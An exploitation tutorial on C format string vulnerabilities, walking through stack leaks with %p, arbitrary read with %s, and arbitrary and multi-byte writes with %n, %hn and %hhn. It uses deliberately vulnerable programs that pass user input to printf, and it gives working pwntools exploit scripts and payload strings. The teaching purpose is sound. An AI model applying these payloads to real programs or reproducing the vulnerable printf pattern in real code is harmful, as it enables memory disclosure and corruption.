Definition
Normal usage
A format string is a string that contains ordinary characters (printed as-is) and conversion specifications, which convert an argument of a given type into text.
It is passed as the format parameter of functions such as printf() (first parameter) and fprintf() (second parameter).
Example:
printf("I have %d apples.\n", 10);
// output:
// I have 10 apples.
The string "I have %d apples.\n" is a format string.
%d is a conversion specification.
d is a conversion specifier.
Each conversion specification consumes the next argument of the call.
So in this case, %d converts the next argument after the format string, which is 10, to signed decimal notation.
More specifiers are described in the manual: man 3 printf.
Let's try to print out the same value with different specifiers:
int val = 10;
printf("Decimal: %d\nFloat: %f\nHex: 0x%x", val, (double) val, val);
Output:
Decimal: 10
Float: 10.000000
Hex: 0xa
Let's try to print it in hexadecimal format 3 times.
int val = 10;
printf("%x %x %x", val, val, val);
We get:
a a a
But what happens if there are more specifiers than arguments?
For example:
int val = 10;
printf("%x %x %x", val);
We get something like this:
a f7c1ca2f 565561a4
What happened?
As said earlier, each conversion specification expects an argument, so with 3 conversion specifications we need 3 arguments after the format string.
On a 32-bit x86 architecture, function arguments are passed on the stack. printf retrieves each argument from the stack,
and if there are not enough, it simply takes whatever value comes next on the stack and uses it.
In the previous example, the stack right before the call to printf looked like this:
pwndbg> stack
00:0000│ esp 0xffffd1a0 ◂— 0x0
01:0004│ 0xffffd1a4 ◂— 0xa /* '\n' */
02:0008│ 0xffffd1a8 —▸ 0xf7c1ca2f ◂— '_dl_audit_preinit'
03:000c│ 0xffffd1ac —▸ 0x565561a4 (replace_me) ◂— 0x2
04:0010│ 0xffffd1b0 —▸ 0xffffd1f0
We can recognize 0xa (10 in hexadecimal) at offset 1 of the stack, followed by f7c1ca2f and 565561a4: the two extra %x simply printed the next two stack values.
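The behaviour can be mimicked with a small Python model. This is only a sketch: the helper name toy_printf_hex is hypothetical, and the list holds the words that follow the format-string pointer in the pwndbg dump above.

```python
def toy_printf_hex(spec_count, stack_words):
    """Toy model: each %x consumes the next 32-bit word after the format pointer."""
    consumed = stack_words[:spec_count]
    return " ".join(format(word, "x") for word in consumed)

# Words that follow the format-string pointer in the pwndbg dump above.
stack_after_format = [0xA, 0xF7C1CA2F, 0x565561A4, 0xFFFFD1F0]

# Three %x but only one real argument: the other two come from the stack.
print(toy_printf_hex(3, stack_after_format))
```

The model prints the same three values as the real program, because printf has no way to know how many arguments were actually passed.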
Exploit: read
Leaking the stack
Let's play with a simple example in C:
#include <stdio.h>
int main(int argc, char **argv)
{
    int secret = 0xdead;
    int secret2 = 0xbeef;
    printf(argv[1], 10);
    return 0;
}
Compile it with:
gcc main.c -o main -m32
And test it:
./main %p.%p.%p.%p.%p.%p.%p
0xa.0xf7c1ca2f.0x565561a4.0xffffd1f0.0xf7fc1678.0xbeef.0xdead
1 |2 |3 |4 |5 |6 |7
You can see the variables secret2 (0xbeef, offset 6) and secret (0xdead, offset 7) leaked in the output, because they are stored on the stack.
If you open the program in gdb and put a breakpoint right before the call to printf(), you will see this:
pwndbg> stack 20
00:0000│ esp 0xffffd1a0 ◂— 0x0
01:0004│ 0xffffd1a4 ◂— 0xa /* '\n' */
02:0008│ 0xffffd1a8 —▸ 0xf7c1ca2f ◂— '_dl_audit_preinit'
03:000c│ 0xffffd1ac —▸ 0x565561a4 (main+23) ◂— 0x2e5005
04:0010│ 0xffffd1b0 —▸ 0xffffd1f0 —▸ 0xf7e1cff4 (_GLOBAL_OFFSET_TABLE_) ◂— 0x21cd8c
05:0014│ 0xffffd1b4 —▸ 0xf7fc1678 —▸ 0xf7ffdbac —▸ 0xf7fc1790 —▸ 0xf7ffda40 ◂— ...
06:0018│ 0xffffd1b8 ◂— 0xbeef
07:001c│ 0xffffd1bc ◂— 0xdead
08:0020│ 0xffffd1c0 —▸ 0xffffd1e0 ◂— 0x1
09:0024│ 0xffffd1c4 —▸ 0xf7e1cff4 (_GLOBAL_OFFSET_TABLE_) ◂— 0x21cd8c
0a:0028│ ebp 0xffffd1c8 ◂— 0x0
0b:002c│ 0xffffd1cc —▸ 0xf7c23295 (__libc_start_call_main+117) ◂— add esp, 0x10
So each %p we add prints the next element stored on the stack.
Choosing an offset
The format string syntax lets us pick an argument by its position: %<offset>$p prints the element at that offset.
Since we know our value of interest is the 6th element of the stack, we can print it directly with %6$p.
./main $(echo '%6$p')
0xbeef
The single quotes keep the shell from expanding $p as a variable; the $(echo ...) wrapper is optional, and ./main '%6$p' works as well.
You can also escape the $ with a backslash, which looks like:
./main %6\$p
0xbeef
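To make the positional syntax concrete, here is a minimal Python sketch of how %N$p selects a stack element. The helper toy_positional_p is hypothetical, and STACK simply copies the values from the gdb dump above, starting at offset 1.

```python
import re

# Stack words as seen by printf in the gdb dump above (offset 1 first).
STACK = [0xA, 0xF7C1CA2F, 0x565561A4, 0xFFFFD1F0, 0xF7FC1678, 0xBEEF, 0xDEAD]

def toy_positional_p(spec, stack=STACK):
    """Resolve a single '%N$p' specification against a list of stack words."""
    match = re.fullmatch(r"%(\d+)\$p", spec)
    if match is None:
        raise ValueError(f"not a positional %p specification: {spec!r}")
    index = int(match.group(1))      # positions are 1-based
    return hex(stack[index - 1])

print(toy_positional_p("%6$p"))   # secret2
print(toy_positional_p("%7$p"))   # secret
```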
Arbitrary read
Leaking values off the stack is nice, but what if we want to leak a specific value at a given address?
It is possible, with the help of the %s specifier!
In C, a string is handled through a pointer to a null-terminated array of characters.
The %s specifier dereferences the pointer and prints the characters found at that address, up to the first null byte.
Combined with an offset, we can point %<offset>$s at an address stored on the stack, so that it prints what is stored at that address.
Let's see an example in C:
// gcc main.c -o main -m32
#include <stdio.h>
int main(int argc, char **argv)
{
    char *secret = "mysecret";
    printf("secret is at %p\n", secret);
    char buffer[30];
    fgets(buffer, sizeof(buffer), stdin);
    printf(buffer);
    return 0;
}
In this code, the content of secret is never printed, only its address.
Note the use of fgets() instead of the unsafe gets(): fgets() reads at most size - 1 characters (29 here), so the buffer cannot overflow.
Our goal is to use that address to print the content of the string.
When running this program, we get:
./main
secret is at 0x56557008
And it waits for our input.
Let's first see where our input is located on the stack when printf is executed.
└─$ ./main
secret is at 0x56557008
%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
0x1e.0xf7e1d620.0x565561b4.0xf7fc7550.(nil).0xf7c1ca2f.0x7025d048.0x2e70252e.0x252e7025.0x70252e70
1 |2 |3 |4 |5 |6 |7 ^
Tip: use the python3 REPL to generate such a string quickly and to check its length.
$ python3
>>> "%p." * 10
'%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.'
>>> len("%p." * 10)
30
As we can see in the output, our format string begins in the 7th element of the stack.
0x7025 is the bytes p% read as a little-endian number, so %p in memory.
$ python3
>>> bytearray.fromhex("7025")
bytearray(b'p%')
But the word is cut in half: our string does not start exactly at offset 7, because the bytes d048 come before it.
So we can pad our string to make it start exactly on an offset boundary.
Let's prepend aa to our string.
└─$ ./main
secret is at 0x56557008
aa%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
aa0x1e.0xf7e1d620.0x565561b4.0xf7fc7550.(nil).0xf7c1ca2f.0x6161d048.0x252e7025.0x70252e70.
1 |2 |3 |4 |5 |6 |7 a a |8 ^
Now, our format string %p.%p... starts exactly at offset 8 on the stack.
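The same search can be done programmatically. The sketch below is an illustration only: locate_format_string is a hypothetical helper, it assumes a 32-bit little-endian target, and it takes the values leaked by the first %p run (with (nil) entered as 0).

```python
import struct

def locate_format_string(leaked_words, marker=b"%p."):
    """Return (aligned_offset, padding) for a format string seen in leaked words.

    leaked_words: 32-bit values printed by successive %p, first one = offset 1.
    """
    # Rebuild the raw stack bytes: each word is stored little-endian.
    raw = b"".join(struct.pack("<I", word) for word in leaked_words)
    start = raw.find(marker)
    if start < 0:
        raise ValueError("marker not found in the leaked words")
    padding = (-start) % 4                        # bytes needed to reach a word boundary
    aligned_offset = (start + padding) // 4 + 1   # offsets are 1-based
    return aligned_offset, padding

leak = [0x1E, 0xF7E1D620, 0x565561B4, 0xF7FC7550, 0x0,
        0xF7C1CA2F, 0x7025D048, 0x2E70252E, 0x252E7025, 0x70252E70]
print(locate_format_string(leak))
```

For this leak the helper reports 2 bytes of padding and offset 8, which matches the manual analysis with the aa prefix.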
So we can place the address we want to leak at that position, then point the %s specifier at it.
Can you guess what the payload will look like?
Elements to re-order: [address][specifier][padding]
Answer: [padding][address][specifier]
Final Exploit
from pwn import *
target = './main'
elf = context.binary = ELF(target)
payload = b'aa' # padding
payload += p32(0x56557008) # address of var `secret`
payload += b'%8$s' # string specifier
p = process()
print(p.clean())
p.sendline(payload)
print(p.clean())
└─$ python3 exploit.py
[*] '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_read/main'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_read/main': pid 27765
b'secret is at 0x56557008\n'
[*] Process '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_read/main' stopped with exit code 0 (pid 27765)
b'aa\x08pUVmysecret\n'
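If pwntools is not available, the same payload can be assembled with the standard library. This is a minimal sketch assuming a 32-bit little-endian target; build_read_payload is a hypothetical helper, and the check for null and newline bytes reflects the fact that printf stops parsing at a null byte and fgets stops reading at a newline.

```python
import struct

def build_read_payload(address, offset, padding=b"aa"):
    """[padding][address][%<offset>$s] for a 32-bit little-endian target."""
    packed = struct.pack("<I", address)    # same bytes as pwntools' p32()
    if b"\x00" in packed or b"\n" in packed:
        # The address sits before the specifier, so these bytes would cut the payload short.
        raise ValueError("address contains a byte that would truncate the payload")
    return padding + packed + f"%{offset}$s".encode()

payload = build_read_payload(0x56557008, 8)
print(payload)
```

The first six bytes of the result are the aa\x08pUV prefix visible in the program output above.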
Now go practice with the easy exercises for format string.
Exploit: write
We learned that with a user-controlled format string, we can read anywhere.
But we can also write anywhere, thanks to the %n specifier:
%n: The number of characters written so far is stored into the integer pointed to by the corresponding argument.
Source: man 3 printf
int len = 0;
printf("hello %n", &len);
What is the value of len?
Answer
hello = 5 bytes
space = 1 byte
So len is 6.
Right before the call to printf, the stack looked like this:
pwndbg> stack 20
00:0000│ esp 0xffffd1a0 ◂— 0x0
01:0004│ 0xffffd1a4 ◂— 0x56556123 (len) ◂— 0x0
...
The address of the variable len is at offset 1 on the stack, and %n overwrites the value it points to (at 0x56556123) with the number of characters written so far.
Example
Let's try with an example:
// gcc main.c -m32 -o main -no-pie
#include <stdio.h>
int replace_me = 0;
void main()
{
    char buffer[30];
    fgets(buffer, sizeof(buffer), stdin);
    printf(buffer);
    if (replace_me == 10)
    {
        puts("You win !");
    }
    else if (replace_me != 0)
    {
        puts("You're close, keep trying...");
    }
}
The goal is to overwrite the value of the variable replace_me with 10.
A buffer overflow is not possible here, since fgets() never reads more than the buffer can hold.
Find address
First, let's try to find the address of the variable we want to replace.
Since replace_me is a global variable (and the binary was compiled with -no-pie), we can retrieve its address with readelf.
└─$ readelf -s main | grep "replace_me"
25: 0804c01c 4 OBJECT GLOBAL DEFAULT 24 replace_me
So replace_me's address is 0x804c01c.
Find stack offset
Next, we need to find where our payload will end up on the stack.
└─$ ./main
%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
0x1e.0xf7e1d620.0x804918d.0x702514a0.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70
1 |2 |3 |4 ^
Our string starts in the 4th element of the stack, but it is cut in half again by two unrelated bytes.
So we add 2 bytes of padding to make our string start exactly at offset 5.
└─$ ./main
aa%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
aa0x1e.0xf7e1d620.0x804918d.0x616114a0.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.
1 |2 |3 |4 a a |5 ^
Now we can build our payload. We want the stack to look like this, with the address of replace_me at offset 5 (its bytes \x1c\xc0\x04\x08 read back as the word 0x804c01c):
└─$ ./main
aa%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
aa0x1e.0xf7e1d620.0x804918d.0x616114a0.0x804c01c....
1 |2 |3 |4 a a |5 address of replace_me
Write exploit
from pwn import *
target = './main'
elf = context.binary = ELF(target)
REPLACE_ME = 0x0804c01c
p = process()
payload = b'aa' # padding, 2 bytes
payload += p32(REPLACE_ME) # address of variable replace_me, 4 bytes
payload += b'a' * 4 # 6 bytes written already, need to add 4 to make 10
payload += b'%5$n' # write 10 to address that is on offset 5 of the stack
print(p.clean())
p.sendline(payload)
print(p.clean())
└─$ python3 exploit.py
[*] '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_write/main'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Starting local process '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_write/main': pid 29583
14
b''
[*] Process '/home/vagrant/course/examples/fmt_string/read_example/arbitrary_write/main' stopped with exit code 10 (pid 29583)
b'aa\x1c\xc0\x04\x08aaaa\nYou win !\n'
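The arithmetic behind the filler can be captured in a few lines. The sketch below is a standard-library version of the exploit payload, assuming a 32-bit little-endian target; build_write_payload is a hypothetical helper, not a pwntools function.

```python
import struct

def build_write_payload(address, value, offset, padding=b"aa"):
    """[padding][address][filler][%<offset>$n], writing `value` via %n."""
    prefix = padding + struct.pack("<I", address)   # bytes printed before the filler
    filler_len = value - len(prefix)
    if filler_len < 0:
        raise ValueError("value is smaller than the bytes already printed")
    return prefix + b"a" * filler_len + f"%{offset}$n".encode()

payload = build_write_payload(0x0804C01C, 10, 5)
print(payload)
```

With the values from this example, the filler is 10 - 6 = 4 characters, and the whole payload is 14 bytes, well within the 29 bytes that fgets() accepts.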
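You can also use a field width to print the filler characters:
%<length>d or %<length>c
%<length>c always prints exactly <length> characters, while %<length>d prints more if the number has more than <length> digits.
In our previous exploit, it would look like: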
payload = b'aa'
payload += p32(REPLACE_ME)
payload += b'%4d%5$n' # or b'%4c%5$n'
Automate with pwntools
Pwntools has a feature for automating %n format string exploits:
payload = fmtstr_payload(offset, {location: value}, numbwritten)
- offset is the offset we find on the stack
- location is the address where we want to write
- value is the value we want to write at location
- numbwritten (optional) is the number of already written bytes
The dictionary can contain more values if needed, in case we need to write at multiple addresses.
Check https://docs.pwntools.com/en/stable/fmtstr.html#pwnlib.fmtstr.FmtStr for more details.
For our example, the payload would look like:
payload = b'aa'
payload += fmtstr_payload(5, {REPLACE_ME: 10}, 2)
- 5 is the offset on the stack
- 2 matches the 2 bytes of b'aa' that were already written
Multi-byte write
What if we want to write a very large number? For example 0xbabeface, at address 0xffffaaaa?
We can't write it with a single %n: %n stores the character count into an int, whose maximum value is 2,147,483,647,
and 0xbabeface in decimal is 3,133,078,222.
It would overflow the int, and printing billions of characters is not practical anyway.
So we need to split the write into several smaller writes. We can either:
- write byte by byte (little-endian, so in reverse order):
  0xffffaaaa: 0xce
  0xffffaaab: 0xfa
  0xffffaaac: 0xbe
  0xffffaaad: 0xba
  You can use %hhn to write byte by byte.
- write 2 shorts (2 bytes + 2 bytes):
  0xffffaaaa: 0xface
  0xffffaaac: 0xbabe
  You can use %hn to write shorts.
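The split itself is plain bit manipulation. As a small sketch (split_write is a hypothetical helper, and a 32-bit little-endian layout is assumed), the two tables above can be reproduced like this:

```python
def split_write(address, value, chunk_size):
    """Split a 32-bit value into little-endian chunks of chunk_size bytes (1 or 2)."""
    if chunk_size not in (1, 2):
        raise ValueError("chunk_size must be 1 (%hhn) or 2 (%hn)")
    mask = (1 << (8 * chunk_size)) - 1
    writes = []
    for i in range(0, 4, chunk_size):
        chunk = (value >> (8 * i)) & mask   # i-th chunk, least significant first
        writes.append((address + i, chunk))
    return writes

for addr, chunk in split_write(0xFFFFAAAA, 0xBABEFACE, 1):
    print(hex(addr), hex(chunk))
```

Calling it with chunk_size=2 gives the two-short variant.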
What would the payload look like if we wanted
to overwrite the value at address 0xffffaaaa with value 0xbabeface, and:
- using byte writes (%hhn)
- payload starts at offset 5
Hint 1
[1st writing][offset specifier][2nd writing][offset specifier][3rd writing][offset specifier][4th writing][offset specifier][1st address][2nd address][3rd address][4th address]
Hint 2
Start with the smallest byte, 0xba, then add the others in ascending order (smallest to largest).
Answer
%186c%16$hhn%4c%17$hhn%16c%18$hhn%44c%19$hhn\xad\xaa\xff\xff\xac\xaa\xff\xff\xaa\xaa\xff\xff\xab\xaa\xff\xff
- %186c: we first write ba (186 characters) because it's the smallest byte
- %16$hhn: we write to the address at offset 16, which should be 0xffffaaad (offset determined at the end)
- %4c: the next byte to write is be, and we already printed 186 chars, so we need 0xbe - 0xba = 4 more to reach be
- %17$hhn: we write to the address at offset 17, which should be 0xffffaaac
- %16c: the next byte to write is ce, and we already printed 190 chars, so we need 0xce - 0xbe = 16 more to reach ce
- %18$hhn: we write to the address at offset 18, which should be 0xffffaaaa
- %44c: the next byte to write is fa, and we already printed 206 chars, so we need 0xfa - 0xce = 44 more to reach fa
- %19$hhn: we write to the address at offset 19, which should be 0xffffaaab
- \xad\xaa\xff\xff: 0xffffaaad packed in little-endian
- \xac\xaa\xff\xff: 0xffffaaac packed in little-endian
- \xaa\xaa\xff\xff: 0xffffaaaa packed in little-endian
- \xab\xaa\xff\xff: 0xffffaaab packed in little-endian
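The widths in this answer follow from the running character count. A short sketch (padding_widths is a hypothetical helper) computes them; the modulus reflects that %hhn keeps only the low 8 bits of the count and %hn the low 16 bits.

```python
def padding_widths(targets, modulus=256):
    """Widths for successive %<width>c so the counter hits each target in turn."""
    widths = []
    written = 0
    for target in targets:
        width = (target - written) % modulus   # characters still missing
        widths.append(width)
        written += width
    return widths

print(padding_widths([0xBA, 0xBE, 0xCE, 0xFA]))
```

A width of 0 would need special handling in a real payload (the %c should then be omitted), which this sketch does not do.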
To calculate the offsets, first write the whole format part with the offsets left out:
%186c%$hhn%4c%$hhn%16c%$hhn%44c%$hhn
Then you calculate the total length of the payload:
>>> len('%186c%$hhn%4c%$hhn%16c%$hhn%44c%$hhn')
36
36 / 4 = 9, so this payload without offsets takes 9 slots on the stack.
We know that our offsets will be at least 5 + 9 = 14, so each offset takes 2 digits, i.e. 2 bytes.
We have 4 offsets to place, so 4 * 2 = 8 bytes.
The total length of our payload will be 36 + 8 = 44 bytes, and it's a multiple of 4 bytes, so no padding
is needed to align the addresses (they will start exactly at a stack offset).
44 / 4 = 11, so our first address will start at offset 5 + 11 = 16.
What would the payload look like if we wanted
to overwrite the value at address 0xffffaaaa with value 0xbabeface, and:
- using short writes (%hn)
- payload starts at offset 5
Hint 1
[1st writing][offset specifier][2nd writing][offset specifier][1st address][2nd address]
Hint 2
Start with the smallest short, 0xbabe.
Answer
%47806c%12$hn%16400c%13$hnaa\xac\xaa\xff\xff\xaa\xaa\xff\xff
- %47806c: we first write babe (47806 characters) because it's smaller than face; the character count only grows, so ascending order is simplest
- %12$hn: we write to the address at offset 12, which should be 0xffffaaac
- %16400c: we already printed 47806 chars, so we need 0xface - 0xbabe = 16400 more to reach face
- %13$hn: we write to the address at offset 13, which should be 0xffffaaaa
- aa: padding, so that the length of the format part is aligned to 4 bytes (multiple of 4)
- \xac\xaa\xff\xff: 0xffffaaac packed in little-endian
- \xaa\xaa\xff\xff: 0xffffaaaa packed in little-endian
The offsets are 12 and 13, because the string %47806c%12$hn%16400c%13$hnaa contains 28 bytes.
28 / 4 = 7 elements on the stack.
Since our payload starts at offset 5, 5 + 7 = 12, so our addresses will start on the stack
at offset 12, then 13.
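Both answers can be regenerated with a short script. This is a sketch under stated assumptions, not how pwntools builds its payloads: build_multi_write is a hypothetical helper for a 32-bit little-endian target, it places the addresses after the format part as in the answers above, and it recomputes the argument indices until they agree with the final layout.

```python
import struct

def build_multi_write(address, value, start_offset, chunk_size):
    """Format-string payload writing a 32-bit value in 1- or 2-byte chunks.

    Layout: [%<width>c%<idx>$hhn ...][padding][addresses], 32-bit little-endian.
    """
    suffix = {1: "hhn", 2: "hn"}[chunk_size]
    mask = (1 << (8 * chunk_size)) - 1
    # (chunk value, address) pairs, smallest chunk first so the counter only grows.
    writes = sorted(
        ((value >> (8 * i)) & mask, address + i) for i in range(0, 4, chunk_size)
    )

    first_index = start_offset            # initial guess, refined below
    for _ in range(10):
        fmt, written = "", 0
        for n, (chunk, _addr) in enumerate(writes):
            if chunk > written:           # equal chunks need no extra characters
                fmt += f"%{chunk - written}c"
                written = chunk
            fmt += f"%{first_index + n}${suffix}"
        fmt += "a" * (-len(fmt) % 4)      # align the addresses on a stack slot
        new_index = start_offset + len(fmt) // 4
        if new_index == first_index:      # indices match the layout: done
            packed = b"".join(struct.pack("<I", addr) for _chunk, addr in writes)
            return fmt.encode() + packed
        first_index = new_index
    raise RuntimeError("argument indices did not stabilise")

print(build_multi_write(0xFFFFAAAA, 0xBABEFACE, 5, 1))
print(build_multi_write(0xFFFFAAAA, 0xBABEFACE, 5, 2))
```

The loop is needed because the number of digits in each index changes the length of the format part, which in turn changes where the addresses land on the stack.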